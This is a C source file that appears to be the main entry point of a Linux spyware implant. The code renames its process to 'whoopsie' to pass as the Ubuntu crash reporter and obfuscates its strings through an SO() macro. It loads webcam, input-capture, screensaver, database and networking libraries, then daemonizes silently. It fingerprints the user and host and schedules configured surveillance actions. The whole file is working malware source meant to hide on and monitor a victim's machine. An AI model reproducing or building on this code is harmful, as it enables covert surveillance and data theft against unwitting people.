#define PROCESSNAME SO"whoopsie"

#define _BSD_SOURCE
#include <unistd.h>
#include <openssl/evp.h>
#include <pwd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/file.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <X11/Xlib.h>
#include <openssl/sha.h>
#include <curl/curl.h>

#include "runtime.h"
#include "so.h"
#include "me.h"
#include "config.h"
#include "eventmanager.h"
#include "actionmanager.h"
#include "module.h"

Display *display;

extern void createactions(void);

int main(int argc, char *argv[]);
void getuser(void);
void gethost(void);
void getinstance(void);

int main(int argc, char *argv[])
{
   char cwd[256], *p = NULL;
   int ret, lock;

   so();

   do {
      if((ret = readlink(SO"/proc/self/exe", cwd, sizeof(cwd))) == -1) break;
      if(ret == sizeof(cwd)) break;
      cwd[ret] = '\0';
      if(!(p = strrchr(cwd, '/'))) break;
      *p = '\0';
   } while(0);
   if(!p || chdir(cwd)) {
      errorme("Unable to change working directory\n");
      exit(EXIT_FAILURE);
   }
   debugme("Working directory is now %s\n", cwd);

   if(initlib(INIT_LIBCURL)) {
      errorme("Unable to load libcurl\n");
      exit(EXIT_FAILURE);
   }
   if(initlib(INIT_LIBJPEG)) {
      errorme("Unable to load libjpeg\n");
      exit(EXIT_FAILURE);
   }
   if(initlib(INIT_LIBV4L2)) {
      errorme("Unable to load libv4l2\n");
      exit(EXIT_FAILURE);
   }
   if(initlib(INIT_LIBSQLITE3)) {
      errorme("Unable to load libsqlite3\n");
      exit(EXIT_FAILURE);
   }
   if(initlib(INIT_LIBXI)) {
      errorme("Unable to load libXi\n");
      exit(EXIT_FAILURE);
   }
   if(initlib(INIT_LIBXSS)) {
      errorme("Unable to load libXss\n");
      exit(EXIT_FAILURE);
   }
   if(initlib(INIT_LIBCRYPTO)) {
      errorme("Unable to load libcrypto\n");
      exit(EXIT_FAILURE);
   }

   if(strlen(argv[0]) >= strlen(PROCESSNAME)) {
      memset(argv[0], '\0', strlen(argv[0]));
      strcpy(argv[0], PROCESSNAME);
   }
   debugme("Process name is now %s\n", PROCESSNAME);

   if(((lock = open(SO".lock", O_WRONLY|O_CREAT, 0600)) == -1) || flock(lock, LOCK_EX|LOCK_NB)) {
      errorme("Unable to acquire lock - another instance is already running\n");
      exit(EXIT_FAILURE);
   }
   debugme("Lock acquired - I'm on my own\n");

   if((display = XOpenDisplay(NULL)) == NULL) {
      errorme("Unable to connect to X\n");
      exit(EXIT_FAILURE);
   }
   debugme("Connected to X\n");

#ifndef DEBUG
   debugme("Going in background\n");
   if(daemon(1, 0)) {
      errorme("Unable to daemonize\n");
      exit(EXIT_FAILURE);
   }
#endif

   OpenSSL_add_all_ciphers();
   debugme("OpenSSL initialized\n");

   if(curl_global_init(CURL_GLOBAL_NOTHING)) {
      errorme("libcurl initialization failed\n");
      exit(EXIT_FAILURE);
   }
   debugme("libcurl initialized\n");

   getuser();
   debugme("User is %s\n", user);
   gethost();
   debugme("Host is %s\n", host);
   getinstance();
   debugme("Instance is %s\n", instance);

   parseconfig(SO"config");
   debugme("Configuration parsed\n");

   createactions();
   debugme("Actions created\n");
   em_scheduleevents();
   debugme("Events scheduled\n");

   while(1) {
      sleep(10);
      XFlush(display);
   }   	

   return 0;
}

void getuser(void)
{
   struct passwd pwd;
   struct passwd *result;
   char buf[1024];

   getpwuid_r(getuid(), &pwd, buf, sizeof(buf), &result);
   if(result == NULL) {
      snprintf(user, sizeof(user), SO"(uid%u)", getuid());
   } else {
      snprintf(user, sizeof(user), "%s", pwd.pw_name);
   }

   return;
}

void gethost(void)
{
   if(gethostname(host, sizeof(host))) {
      snprintf(host, sizeof(host), "%s", SO"(unknown)");
   } else {
      host[sizeof(host) - 1] = '\0';
   }

   return;
}

void getinstance(void)
{
   SHA_CTX sha_ctx;
   unsigned char sha[SHA_DIGEST_LENGTH];

   SHA1_Init(&sha_ctx);
   SHA1_Update(&sha_ctx, user, strlen(user));
   SHA1_Update(&sha_ctx, host, strlen(host));
   SHA1_Final(sha, &sha_ctx);
   
   memcpy(instance, sha, sizeof(instance) - 1);
   instance[sizeof(instance) - 1] = '\0';

   return;
}
